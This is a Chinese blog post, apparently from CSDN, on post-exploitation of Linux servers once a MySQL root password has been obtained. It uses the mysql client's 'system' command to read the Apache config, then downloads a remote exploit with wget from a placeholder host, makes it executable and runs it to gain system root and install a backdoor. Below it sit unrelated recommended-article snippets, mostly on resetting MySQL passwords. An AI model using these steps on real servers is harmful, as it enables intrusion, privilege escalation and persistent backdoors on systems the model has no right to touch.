linux下mysql 5.x得到root密码后的另外一种利用方式

最新推荐文章于 2025-12-05 18:26:01 发布

原创最新推荐文章于 2025-12-05 18:26:01 发布 · 585 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#mysql #linux #system #web #ssh

本文介绍了一种使用MySQL的system函数来执行系统命令并提升权限的方法。通过直接在MySQL中执行命令，可以查找web路径、下载并运行exp文件，最终获取root权限。

mysql 5.x里面引入了一个system函数，这个函数可以执行系统命令，当mysql以root登陆的时候，就可以利用这个函数执行命令，当然是在权限许可的范围内。

一般我们按照常规思路，搞到mysql的root密码之后，我们都会连接上去，创建一个表，然后outfile，搞到一个webshell ,然后提权如此这般。今天我们换一种方式。

按照上面的方法，我们需要知道web的绝对路径，当然这个很不好找，有些有sqlinjection的，可能报错会显示出来，有的就不一定了。但是按照我的的方法，没有必要再去找web路径了，直接执行

mysql>system vi /etc/httpd/conf/httpd.conf;

直接这样就可以找到web的路径，当然，我们的目的并不是找web路径，放webshell进去。我们是要来做其他的事情，比如，下载exp执行，搞到root权限，然后装后门虾米的

mysql>system wget http://xxxx.xxx.com/xxxx ;

mysql>system chmod +x xxxx;

mysql>system ./xxxx;

这样mysql的root此时就成为system的root了，剩下的事情，如果开了ssh,就ssh上去，输入mysql的用户密码，ok,搞定。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

inject2006

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

linux系统中重置mysql的root密码

12-15

以下是一种在Linux环境下重置MySQL root密码的详细方法：首先，你需要确认你的系统中是否已经安装了MySQL。在Debian类的Linux发行版中，可以使用`dpkg –list | grep mysql`命令来检查。如果MySQL已安装，你会看到...

精选资源

mysql-5.7.44-linux-glibc2.12-x86-64.tar.gz

01-24

- **SQL模式**：提供了一种控制数据验证和输入的方式，可以在全局、会话或查询级别设置SQL模式。 2. **在Linux上安装MySQL 5.7.44** - **解压源码包**：首先，你需要使用`tar`命令解压`mysql-5.7.44-linux-glibc...

参与评论您还未登录，请先登录后发表或查看评论

Linux下MySQL基本操作

m0_67393413的博客

04-20

1121

linux下Mysql命令 1、进入mysql，终端中输入 mysql -u用户名 -penter键后，提示输入密码。输入密码后，enter进入数据库。 2、show databases; 显示此用户下的数据库； 3、use 数据库名; 切换数据库 4、show tables; 显示该数据库下所有表 5、desc users; 显示users这个表的详细信息 6、创建一个表 7、向表中插入一条记录，可以连续插入多条记录 8、查表 9、条件查询 10、删除一条记录 11、修改（更新）记

mysql system函数_mysql 5.x的system函数认识纠正

weixin_34577501的博客

01-19

267

今天遇到一服务器，passwd文件内mysql这个用户是有shell的。 [/var/lib/mysql/]$ cat /etc/passwd |grep mysqlmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash 想提权，但不想反弹，考虑着直接ssh过去，mysql的home目录为 /var/lib/mysql 如果能建一个今天遇到一服务器，...

Mysql通过system命令调用系统shell命令

热门推荐

CleverCode的博客

08-07

1万+

CleverCode发现可以通过system + 系统shell命令。来执行一些系统方法shell命令。 1 ? 显示帮助。system (\!) Execute a system shell command. system date;系统日期。 sytem pwd;system whoami;system clear;等技术交流 Clever...

mysql 5.7新命令

gavinking0110的博客

11-11

816

[mysqld] character-set-server=utf8 character-set-filesystem=utf8 原来：default-character-set=utf8

Linux下mysql 5.x得到root密码后的另外一种利用方式

09-29

598

刚才在卫生间蹲着的时候突然想到这个问题，mysql5.x for linux下面有一个函数，可以帮助我们干很多事情，这个函数4。x下面貌似没，原来一直没发现，也没去查函数手册，就我自己的经验来写点东西。4,x的明天再看看函数手册，再装一个实验一下。mysql 5.x里面引入了一个system函数，这个函数可以执行系统命令，当mysql以root登陆的时候，就可以利用这个函数执行命令，当然是在权限许

linux下mysql查看root密码_MySQL数据库之在Linux环境下mysql的root密码忘记解决方法（三种）...

weixin_42503415的博客

01-27

3790

本文主要向大家介绍了MySQL数据库之在Linux环境下mysql的root密码忘记解决方法(三种) ，通过具体的内容向大家展现，希望对大家学习MySQL数据库有所帮助。MySQL密码的恢复方法之一1．首先确认服务器出于安全的状态，也就是没有人能够任意地连接MySQL数据库。因为在重新设置MySQL的root密码的期间，MySQL数据库完全出于没有密码保护的状态下，其他的用户也可以任意地登录和...

如何在linux下修改mysql密码,如何在Linux下修改Mysql的用户（root）密码

weixin_32506743的博客

04-30

865

下面给大家分享下在Linux下如何修改Mysql的用户(root)的密码，分两种情况：第一种当拥有原来的mysql的root密码，第二种情况忘记原来的mysql的root的密码。修改的用户都以root为列。一、拥有原来的mysql的root的密码；方法一：在mysql系统外，使用mysqladmin复制代码代码如下:# mysqladmin -u root -p password "test12...

Mysql数据库--修改root密码的几种方法(忘记密码&知道密码)

✨ 欢迎来到【Seal ^_^ 的优快云博客】！✨

06-07

1万+

Mysql数据库--修改root密码的几种方法（忘记密码&知道密码）

Linux系统MySQL重置root密码

飙歌的博客

01-30

1325

首先，我们停止MySQL服务，然后以安全模式启动MySQL，并使用没有密码的root用户访问数据库。接着，我们修改root用户的密码，并重新启动MySQL服务。在MySQL中，root是默认的超级用户，具有最高权限。然而，有时候我们可能会遇到忘记root密码的情况，或者需要重置root密码以增加数据库的安全性。接下来，我们需要以安全模式启动MySQL，这样我们就可以在没有密码的情况下访问到root用户。完成密码修改后，我们需要停止安全模式下的MySQL，并重新启动MySQL服务。

在Linux环境下mysql的root密码忘记解决方法（三种）

09-09

以上三种方法都能有效地解决在Linux环境下MySQL root密码忘记的问题。请根据自己的实际情况选择合适的方法，并确保在整个过程中服务器的安全性。在完成密码重置后，记得更新任何依赖于旧密码的应用程序配置，以避免...

如何在Linux下修改Mysql的用户（root）密码

09-10

当需要修改MySQL的root密码时，通常有两种情况：已知原密码和遗忘原密码。以下将详细介绍这两种情况下的密码修改步骤。一、已知原MySQL的root密码 1. 方法一：通过命令行工具`mysqladmin` 在终端输入以下命令，...

精选资源

linux下忘记mysql密码的几种找回方法（推荐）

01-20

今天我们主要是讲一下关于linux忘记mysql密码处理方法，下面提供了5种linux忘记mysql密码找回方法哦。方法一(先进入root权限)： # /etc/init.d/mysql stop # mysqld_safe --user=mysql --skip-grant-tables --...

Linux（CentOS）安装 MySQL

2509_94088022的博客

11-29

833

CentOS版本：CentOS 7三种安装方式：一、通过 yum 安装，最简单，一键安装，全程无忧。二、通过 rpm 包安装，需具备基础概念及常规操作。三、通过 gz 包安装，需具备配置相关操作。

【JAVA】AES加密

随笔

12-03

258

【JAVA】AES加密

mysql_mcp_server部署及应用案例

最新发布

runfarther的专栏

12-05

123

本文介绍了在CentOS 7.5系统下安装和部署mysql_mcp_server的完整流程。主要包括三个部分：1）服务安装步骤，包括源码下载、创建独立Python环境及安装依赖包；2）服务配置方法，涉及创建配置文件、设置监听端口和MySQL数据库连接参数；3）服务启动命令。整个过程详细说明了从环境准备到服务运行的全套操作，为在CentOS系统上部署该MySQL管理服务提供了清晰的指导。

《零基础学PHP：从入门到实战》教程-模块七：MySQL 数据库基础-4

zwh821的博客

12-03

586

PHP连接MySQL数据库操作指南本章介绍了使用PHP的mysqli扩展连接和操作MySQL数据库的核心方法。主要内容包括：两种编程风格：面向对象和面向过程方式，推荐使用面向对象风格数据库连接：建立连接的标准流程和必要的错误处理 SQL操作： SELECT查询及结果处理 INSERT/UPDATE/DELETE操作安全防护：重点讲解SQL注入攻击原理演示不安全的字符串拼接方式的风险推荐使用预处理语句（prepare/bind_param/execute）作为唯一正确的防护手段通过代码示例展示

开启mysql的binlog日志

2509_94087843的博客

12-01

285

命令，您需要在操作系统的命令行界面（例如Windows的命令提示符或PowerShell，Linux或macOS的终端）中执行，而不是在MySQL命令行客户端或任何SQL管理工具中。加一行log-bin=“C:/ProgramData/MySQL/MySQL Server 5.7/logs/log-bin”指定了二进制日志索引文件的名称，该文件记录了所有当前活跃和旧的binlog文件的位置。指定了服务器将保留的最大binlog文件数量。指定了binlog文件在被自动删除前可以保留的天数。

数据库mysql8.0.40忘记root密码

12-25

当你忘记MySQL 8.0.40的root用户的密码时，可以尝试以下几种恢复方法： 1. **安全模式启动**: - 重启MySQL服务器时加上`--skip-grant-tables`选项启动，这将绕过登录验证。然后通过命令行客户端连接： ``` mysql -u root ``` 2. **利用mysqld_safe的环境变量**: - 在Linux系统上，编辑`/etc/mysql/mysql.conf.d/mysqld.cnf`文件，在`[mysqld]`部分添加： ```text skip-grant-tables ``` - 重启MySQL服务，再次尝试连接。 3. **通过引导修复工具** (Ubuntu/Debian): - 运行 `sudo mysql_secure_installation`，选择"Recovering a Lost Password"并按照提示操作。 4. **从备份恢复**: 如果有备份，直接还原数据库到新安装的数据库中。 5. **初始化脚本** (Windows): - 对于Windows，找到MySQL的安装目录，打开`bin`文件夹下的`my-huge-page-config.bat`文件，注释掉`SET SQL_MODE=NO_ENGINE_SUBSTITUTION,STRICT_TRANS_TABLES`这行，然后重启MySQL。 6. **编辑配置文件手动修改**: - 风险较高，需要谨慎操作。编辑`/var/lib/mysql/my.cnf`（Linux）或`c:\Program Files\MySQL\MySQL Server 8.0\my.ini`（Windows），查找`password`字段，将其值更改为新的密码，然后重启服务。请注意，执行上述步骤前应做好数据备份，以防万一。另外，为了安全起见，建议尽快创建一个新的管理员账户，并设置复杂的密码。完成这些操作后，请不要忘记更新所有用户的密码。